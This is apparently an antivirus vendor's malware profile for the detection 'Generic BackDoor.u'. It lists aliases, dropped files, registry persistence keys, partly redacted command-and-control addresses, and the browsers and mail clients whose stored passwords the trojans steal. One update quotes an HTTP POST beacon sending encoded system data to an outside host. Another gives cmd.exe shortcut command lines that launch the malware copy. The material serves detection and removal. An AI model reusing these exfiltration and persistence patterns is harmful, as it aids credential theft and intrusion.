For Home

Virus Profile: Generic BackDoor.u

Threat Search
Print
   
Virus Profile information details
Risk Assessment: Home Low-Profiled | Corporate Low-Profiled
Date Discovered: 4/5/2005
Date Added: 4/4/2005
Origin: N/A
Length: varies
Type: Trojan
Subtype: Win32
DAT Required: 7001
Removal Instructions
   
 
 
   

Description

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases
  • Microsoft    -    PWS:Win32/Fareit
  • Symantec    -    Downloader.Ponik
  • Nod32        -    Win32/PSW.Fareit.A trojan
  • Norman     -    W32/Troj_Generic.FZZFL (trojan)

 

-- Update March 9, 2010 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:  http://news.techworld.com/security/3214563/energizer-bunny-infects-pcs-with-backdoor-malware/

--

Generic BackDoor.u is a generic detection name for trojans that open a backdoor and allow the attacker to issue commands to control the compromised machines. More information on Generic BackDoor deteections is available here.

 

Indication of Infection

Presence of above mentioned files and registry keys

Presence unexpected network connection to the above mentioned IP Address.

Methods of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, etc.

 

   

Virus Characteristics

------------------------------------------------Updated on 14 June2013--------------------------------------------

Aliases

Symantec    -    Trojan.Gen.2
Norman    -    winpe/Troj_Generic.LTSYE
Microsoft    -    Trojan:MSIL/Remdobe
Drweb        -    BackDoor.Blackshades.17
Kaspersky    -    Trojan.Win32.Agent.ygxb

Generic BackDoor.u  is detection for this Trojan that allows unauthorized access and control of an infected computer to the remote attacker.

This Trojan also opens a backdoor and allows the attacker to issue commands to control the compromised machines.

Upon execution, the Trojan tries to connect the below URL through NBNS.

  • whowas.pw

The Trojan copies itself into the below location.

  • \%APPDATA%\AudioCard\vAudioCard.exe

------------------------------------------------Updated on 21 May 2013--------------------------------------------

Aliases


Microsoft    -    PWS:Win32/Fareit
Symantec    -    Trojan.Zbot
Kaspersky       -    Trojan-PSW.Win32.Tepfer.hlfp
Norman     -    ZBot.HDFL
Ikarus              -           Trojan-Spy.Zbot

“Generic BackDoor.u” is a generic detection for a Trojan that steals sensitive information from the compromised machine and sends it to the remote attacker. The Trojan may delete itself after the execution.  

 “Generic BackDoor.u” steals information from stored passwords, cache and cookies from the following applications:

  • E-mail client
  • Browser
  • FTP client

Upon Execution, the Trojan drops file into the following location:

  • %AppData%\Microsoft\Address Book\ Administrator.wab
  • %AppData%\ Kyhy\nuyf.exe

The following are the folders created by the Trojan

  • %AppData%\Microsoft\Address Book
  • %AppData%\ Kyhy

Upon execution the Trojan injects code into explorer.exe and tries to connect to the following URL :

  • 84[Removed]66.46
  • 81[Removed]145.66
  • 204[Removed]165.68
  • 108[Removed]1.3

The following are the registry key added to the system

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name

The following registry key values have been added to the system.

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000

The above mentioned registry key ensure that the Trojan disables the “firewall disable notification message” settings.

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Windows\CurrentVersion\Run\{GUID}: ""%AppData%\Kyhy\nuyf.exe""

The above registry entry makes sure that the malware gets executed on every time when the system startup

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\
    • LDAP Server ID: 0x00000003
    • Account Name: "WhoWhere Internet Directory Service"
    • LDAP Server: "ldap.whowhere.com"
    • LDAP URL: "http://www.whowhere.com"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000000
    • LDAP Simple Search: 0x00000001
    • LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\
    • LDAP Server ID: 0x00000002
    • Account Name: "VeriSign Internet Directory Service"
    • LDAP Server: "directory.verisign.com"
    • LDAP URL: "http://www.verisign.com"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000000
    • LDAP Search Base: "NULL"
    • LDAP Simple Search: 0x00000001
    • LDAP Logo: "%ProgramFiles%\Common Files\ Services\verisign.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\
    • LDAP Server ID: 0x00000001
    • Account Name: "Bigfoot Internet Directory Service"
    • LDAP Server: "ldap.bigfoot.com"
    • LDAP URL: "http://www.bigfoot.com"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000000
    • LDAP Simple Search: 0x00000001
    • LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\
    • LDAP Server ID: 0x00000000
    • Account Name: "Active Directory"
    • LDAP Server: "NULL"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000002
    • LDAP Simple Search: 0x00000000
    • LDAP Bind DN: 0x00000000
    • LDAP Port: 0x00000CC4
    • LDAP Resolve Flag: 0x00000001
    • LDAP Secure Connection: 0x00000000
    • LDAP User Name: "NULL"
    • LDAP Search Base: "NULL"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\
    • PreConfigVer: 0x00000004
    • PreConfigVerNTDS: 0x00000001
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\
    • Server ID: 0x00000004
    • Default LDAP Account: "Active Directory GC"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name\: "%AppData%\Microsoft\Address Book\Administrator.wab"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\OlkContactRefresh: 0x00000000
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\OlkFolderRefresh: 0x00000000

The following is the information collected from the infected machine and sends to the remote attacker through remote port 8080:

  • GetUserNameA
  • Gethostbyname
  • GetLocaleInfoA
  • GetSystemInfo

--------------------------------------------------Updated 2nd Apr 2013------------------------------------------------

Aliases

  • Ikarus   - Trojan-Downloader.Win32.Homa

Characteristics –

Generic Backdoor.u” is detection for this Trojan that receives commands from an attacker to access the infected machine and to download other payloads.

The Trojan connects to the following IP address.

  • 188.[Removed].47.145

The Trojan drops the following files.

  • %userprofile%\UserName\Desktop\cnf.txt
  • %userprofile%\UserName\Desktop\GooglSrvices.lnk
  • %userprofile%\UserName\Desktop\R.vbs
  • %userprofile%\UserName\Recent\cnf.txt.lnk
  • %userprofile%\UserName\Recent\R.vbs.lnk
  • %userprofile%\UserName\Start Menu\Programs\Startup\GooglSrvices.lnk
  • %userprofile%\Administrator\Start Menu\Programs\Startup\Updater.lnk

The Above .lnk files were created, which pointed the malware file.

The  script file which is dropped (R.vbs) on desktop, which would be used to run the .lnk files which inturn would run the executable file.

---------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------Updated 1st Apr 2013------------------------------------------------

Aliases

  • Microsoft - Trojan:Win32/Viensi.A

Characteristics –

Generic Backdoor.u” is a detection for this Trojan which posts some encrypted system information data to the sites and might also download the malicious contents from websites and infect the comprised system.

Upon execution the Trojan first calls shutdown.exe file, So that the “Turnoff “menu appears.

The Trojan connects to the following URL’s.

  • ca.[Remove].it
  • 12.120.[Removed].206
  • 12.120.[Removed].208

The above mentioned URL’s might change depending on geographical locations where the malicious content is executed and posts some encrypted system information data to the sites above.

  • POST /ping.html HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705) Host: e-statistics.cc Content-Length: 9948 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ... <BIG BLOCK OF base64 DATA>

The Trojan may also add LNF files using a format similar to the below types:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start "" "OriginalApp.exe" or /C start cmd.exe /C if exist “\path\to\[Random].[xXxX]" start "" "[Random].[xXxX] or /C start cmd.exe /C if exist "[Random].[xXxX]" start "" "[Random].[xXxX]" && start "" "OriginalFileName" or /C start cmd.exe /C if exist "[Random].[xXxX]" start "" "[Random].[xXxX]" && start "" " OriginalFileName " \path\to\thLmbs.db

The Trojan will also open the copy prior to opening the original target.
Trojan might also download the malicious contents from websites and infect the comprised system.

---------------------------------------------------------------------------------------------------------------------------------

-------Updated 17th Jan 2013---------

Generic BackDoor.u” steals information from stored passwords, cache and cookies from the following applications:

E-mail client
Browser
FTP client

The Trojan also downloads other PWS variants to the compromised machine.

Upon execution the Trojan tries to connect to the following URL through remote port 8080 in order to allow the remote attacker to issue commands to control the compromised machines and to download other payload   

  • hxxp://forum-voip[Removed]080/ponyb/gate.php
  • hxxp://foru[Removed]onyb/gate.php
  • hxxp://paralysi[Removed]/ponyb/gate.php
  • hxxp://paralys[Removed]080/ponyb/gate.php
  • hxxp://accesx[removed]Kv9.exe
  • hxxp://www.k[Removed]uY3VZr.exe
  • hxxp://rankma[Removed].com/XsuzdnC3.exe
  • 254.11[Removed]192
  • 25[Removed]8.192

The above mentioned URLs are down at the time of analysis.

The following registry key values have been added to the system.

HKey_Current_Users\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass:1

The above mentioned registry keys ensure that the Trojan disables the proxy settings.

HKEY_USERS\S-1-5-[Varies]\Software\WinRAR\HWID: 7B 38 34 34 34 31 30 30 39 2D 43 35 45 35 2D 34 38 45 30 2D 41 42 46 46 2D 39 43 38 34 46 43 39 36 31 34 31 37 7D

The Trojan creates Mutex in the following name:

_!MSFTHISTORY!_   

The following is the information collected from the infected machine and sent to the remote attacker through remote port 80:

  • GetLocaleInfoA
  • GetUserNameA
  • gethostbyname
  • GetNativeSystemInfo
  • GetSystemInfo

The Trojan steals stored passwords, cache and cookies from the following applications.

  • Opera
  • Firefox
  • Internet Explorer
  • Google Chrome
  • Windows Live Mail
  • Thunderbird
  • Bromium
  • Nichrome
  • Comodo
  • RockMelt
  • Visicom Media
  • Chromium
  • Global Downloader
  • NetSarang
  • Cyberduck
  • Pocomail
  • BatMail

The Trojan tries to hack servers using below password list:

   

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).